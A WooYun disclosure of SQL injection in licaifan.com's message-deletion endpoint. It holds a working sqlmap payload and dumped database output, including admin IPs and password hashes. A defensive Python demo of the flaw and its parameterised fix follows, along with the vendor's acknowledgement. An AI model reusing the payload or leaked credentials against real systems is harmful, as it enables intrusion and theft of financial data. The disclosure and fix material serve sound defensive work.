WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-06-08: Details reported to the vendor, awaiting the vendor's handling
2015-06-08: Vendor has confirmed; details disclosed to the vendor only
2015-06-18: Details disclosed to core white hats and experts in the relevant field
2015-06-28: Details disclosed to ordinary white hats
2015-07-08: Details disclosed to intern white hats
2015-07-23: Details disclosed to the public

I'm a P2P bandwagon-jumping youngster.

After logging in, open the messages page; messages can be deleted there.

The request is as follows:

POST http://www.licaifan.com:80/user/delMessage
msg_id=1111&action=delete

The msg_id parameter is vulnerable to SQL injection.
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] licaifan
[*] test

Database: licaifan
[104 tables]
+--------------------------+
| YiiSession               |
| user                     |
| account                  |
| account_cash             |
| account_log_150202       |
| account_recharge         |
| adm_admin                |
| adm_award_log            |
| adm_company_users        |
| adm_email_template       |
| adm_login_record         |
| adm_logs                 |
| adm_other_type           |
| area                     |
| award_log                |
| card_auth                |
| consumer_credit_gain_log |
| consumer_invest_log      |
| cps_lanlicai             |
| error                    |
| exp_code                 |
| exp_winner               |
| frozen_log               |
| hlf                      |
| hlf_invest_detail_1900   |
| hlf_invest_log           |
| incubator_apply          |
| invest_bonus_log         |
| invest_bonus_log_bak     |
| invest_log               |
| invest_log_bak           |
| invest_view              |
| ios_download             |
| ios_push                 |
| lease_gain_log           |
| lease_invest_log         |
| lease_project            |
| lease_project_payment    |
| lease_project_repayment  |
| loan_application         |
| login_record             |
| meet_apply               |
| message                  |
| mobile_area              |
| mobile_change_log        |
| nation                   |
| net_invest_log           |
| oauth_access_tokens      |
| oauth_clients            |
| oauth_jwt                |
| oauth_refresh_tokens     |
| oauth_scopes             |
| oneYearCoupons           |
| payment                  |
| project_apply            |
| project_award            |
| project_comment          |
| project_company          |
| project_gain_record      |
| project_invest_record    |
| project_payment          |
| project_pic              |
| project_project          |
| project_related          |
| project_repayment        |
| project_transfer         |
| project_transfer2        |
| project_view             |
| project_vouch            |
| protected_answer         |
| protected_questions      |
| recharge_info_log        |
| redemption               |
| redemption_detail        |
| remindmsg_log            |
| research                 |
| score_log                |
| score_setting            |
| score_to_money           |
| service_log              |
| sms_code_check_record    |
| sms_send_log             |
| supertracker             |
| system_setting           |
| trade_gain_log           |
| trade_invest_log         |
| trade_project            |
| trade_project_payment    |
| trade_project_repayment  |
| transfer_available       |
| transfer_log             |
| upload_pic               |
| user_auth                |
| user_extend_mobile       |
| user_login_log           |
| user_qq_userinfo         |
| user_refer               |
| user_remind              |
| user_sina_userinfo       |
| user_tzj                 |
| user_weixin_userinfo     |
| vouch_pic                |
| whos_online              |
| withdraw_log             |
+--------------------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: msg_id (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: msg_id=111) AND (SELECT 9995 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,(SELECT (ELT(9995=9995,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6820=6820&action=delete
---
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL >= 5.0.0

Database: licaifan
Table: system_setting
[15 entries]
+----+-----------------------+----------+--------------------------------------------+
| id | type                  | value    | description                                |
+----+-----------------------+----------+--------------------------------------------+
| 1  | invest_threshold      | 1000     | minimum investment is 1000 yuan            |
| 2  | itemsPerPageInAccount | 10       | items per page in account management       |
| 3  |                       | 10       | messages per page                          |
| 4  | announcement          | <blank>  | site announcement                          |
| 5  | minimum_withdraw      |          | minimum withdrawal amount                  |
| 6  | payment               | pay19    | 一九付 (19Pay)                              |
| 7  | lucky                 | 1403     | NULL                                       |
| 8  | withdraw_fee_type     |          | how the withdrawal fee is charged          |
| 9  | repayment             |          | 一九付 (19Pay)                              |
| 10 | wappayment            |          | LianLian Pay (连连支付)                     |
| 11 | payment_bak           | shengpay |                                            |
| 12 | payment_verify        | llpay    | LianLian Pay (连连支付)                     |
| 13 | apppayment            | wap      | client app top-up channel                  |
| 14 | coupon_probability    | 100      | anniversary red-envelope campaign win rate |
| 15 | withdraw_fee_number   | 3        | number of fee-free withdrawals             |
+----+-----------------------+----------+--------------------------------------------+

Database: licaifan
Table: adm_admin
[36 entries]
+----------+-----------------+--------+---------------------+----------+------------------------------------------+
| admin_id | addip           | status | addtime             | userName | userPassword                             |
+----------+-----------------+--------+---------------------+----------+------------------------------------------+
|          | 203.100.80.24   | 1      |                     | admin    |                                          |
| 1        | 106.185.46.44   | 1      |                     |          | 9f59c01c21bea721ca5cbba9984cd25e1c479a18 |
|          | 203.100.93.15   |        | 2014-10-29 10:05:22 |          |                                          |
|          | 203.100.93.15   |        |                     |          |                                          |
|          | 106.120.244.158 |        | 2014-09-29 18:11:27 |          |                                          |
| 1        |                 |        |                     |          | 79759dbab437869857f4443d81a3e25f9e9b2300 |
| 1        |                 |        |                     |          |                                          |
| 1        | 203.100.93.15   |        |                     |          |                                          |
| 1        |                 |        |                     |          |                                          |
|          |                 |        | 2015-02-15 11:15:53 | luoxin   |                                          |
|          |                 | 1      |
All users' usernames, passwords, identity information, bank card details, transaction passwords, phone numbers, account balances and so on can be obtained.

Fix suggestion: use the framework's query methods (parameterised queries with bound values) rather than concatenating the msg_id parameter into the SQL string.
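The following is an added example written for this page; it is not the site's PHP code and not part of the original report. It simulates the delMessage handler in Python on an in-memory SQLite database so it runs offline: the vulnerable form pastes msg_id into the SQL text, the hardened form validates and binds it. The parenthesised WHERE clause is inferred from the shape of sqlmap's payload (`111) AND (...) AND (6820=6820`), which has to close one bracket and reopen another to fit the original query. The `user_id` and `body` columns, the ownership check and the sample rows are assumptions; only the `message` table and the `msg_id` parameter come from the report. The second part shows why the error-based payload leaks data: sqlmap wraps the value it wants between two hex-encoded marker strings (0x717a627a71 = `qzbzq`, 0x7178787171 = `qxxqq`), forces a MySQL "Duplicate entry" error with the COUNT(*)/FLOOR(RAND(0)*2)/GROUP BY trick, and reads the value back from the error text. In the page's payload the value is the probe `ELT(9995=9995,1)`; in a dump run it is a real column such as a row of adm_admin. The sample error message is constructed, and the MySQL-specific error itself is not reproduced in SQLite.

```python
import re
import sqlite3

# --- Part 1: the delMessage handler, simulated with SQLite -------------------
# Constructed sample data. Only `message` and `msg_id` come from the report;
# the user_id/body columns and the ownership check are assumptions about how
# a message-deletion endpoint is usually written.
SEED = [
    (101, 1, "user 1 message A"),
    (102, 1, "user 1 message B"),
    (201, 2, "user 2 message"),
]


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE message (msg_id INTEGER, user_id INTEGER, body TEXT)")
    db.executemany("INSERT INTO message VALUES (?, ?, ?)", SEED)
    return db


def del_message_vulnerable(db, user_id, msg_id):
    """Vulnerable form: msg_id is pasted into the SQL text.
    The parenthesised WHERE mirrors what the sqlmap payload
    `111) AND (...) AND (6820=6820` reveals about the real query."""
    sql = "DELETE FROM message WHERE (msg_id = %s) AND (user_id = %d)" % (msg_id, user_id)
    cur = db.execute(sql)
    db.commit()
    return cur.rowcount


def del_message_fixed(db, user_id, msg_id):
    """Hardened form: msg_id is validated as an integer and bound as a
    parameter, so the ownership check cannot be short-circuited."""
    try:
        msg_id_int = int(msg_id)
    except (TypeError, ValueError):
        return 0
    cur = db.execute(
        "DELETE FROM message WHERE (msg_id = ?) AND (user_id = ?)",
        (msg_id_int, user_id),
    )
    db.commit()
    return cur.rowcount


def remaining(db):
    return [row[0] for row in db.execute("SELECT msg_id FROM message ORDER BY msg_id")]


def demo(handler, msg_id, user_id=1):
    """Run one request as `user_id` against a fresh DB; return (rows deleted, ids left)."""
    db = fresh_db()
    deleted = handler(db, user_id, msg_id)
    return deleted, remaining(db)


# --- Part 2: why the error-based payload leaks data ------------------------
# sqlmap wraps the value it wants between two hex-encoded marker strings and
# forces a MySQL "Duplicate entry ... for key 'group_key'" error via
# COUNT(*)/FLOOR(RAND(0)*2)/GROUP BY, then reads the value out of the error.

def marker_text(hex_literal):
    """Decode a MySQL 0x... string literal, e.g. 0x717a627a71 -> 'qzbzq'."""
    return bytes.fromhex(hex_literal[2:]).decode("ascii")


START_MARKER = marker_text("0x717a627a71")  # 'qzbzq'
END_MARKER = marker_text("0x7178787171")    # 'qxxqq'


def extract_leaked_value(error_text):
    """Pull the value injected between the markers out of an error message;
    returns None when the response carries no marker pair."""
    m = re.search(re.escape(START_MARKER) + r"(.*?)" + re.escape(END_MARKER), error_text)
    return m.group(1) if m else None


# Constructed example of the MySQL error such a payload produces; the trailing
# digit is the FLOOR(RAND(0)*2) value that collided in the GROUP BY key.
SAMPLE_ERROR = "Duplicate entry 'qzbzq1qxxqq1' for key 'group_key'"


if __name__ == "__main__":
    print(demo(del_message_vulnerable, "201) OR (1=1"))  # attacker as user 1 deletes every row
    print(demo(del_message_fixed, "201) OR (1=1"))       # rejected, nothing deleted
    print(extract_leaked_value(SAMPLE_ERROR))             # the probe value '1'
```

The payload `201) OR (1=1` shows the practical impact beyond data extraction: because AND binds tighter than OR, the concatenated query becomes `(msg_id = 201) OR ((1=1) AND (user_id = 1))`, so user 1 deletes user 2's message and all of their own in one request. The fixed handler never reaches the database with that input, and a plain `201` from user 1 is still refused by the ownership check.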
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-06-08 10:13
Thanks to the reporter for bringing such an important problem to our attention~ We will carefully check our website to avoid this kind of vulnerability!!
None yet